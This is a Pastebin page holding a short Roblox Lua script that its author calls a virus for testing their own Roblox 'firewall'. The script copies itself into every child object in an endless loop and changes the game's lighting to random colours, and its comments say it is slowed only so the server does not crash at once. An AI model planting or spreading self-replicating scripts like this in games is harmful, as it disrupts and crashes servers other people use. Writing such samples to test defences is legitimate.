Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- An virus to test my ROBLOX firewall.
- function reproduce()
- local newPar=script:Clone()
- return newPar
- end
- wait(5) -- Keep things slow at first
- while wait() do
- for _,v in pairs(script.Parent:GetChildren()) do
- reproduce().Parent=v
- game.Lighting.Ambient=BrickColor.Random().Color -- For extra hell
- wait(.5) -- Once again, we don't want the server instantly crashing
- end
- end
Advertisement
Add Comment
Please, Sign In to add comment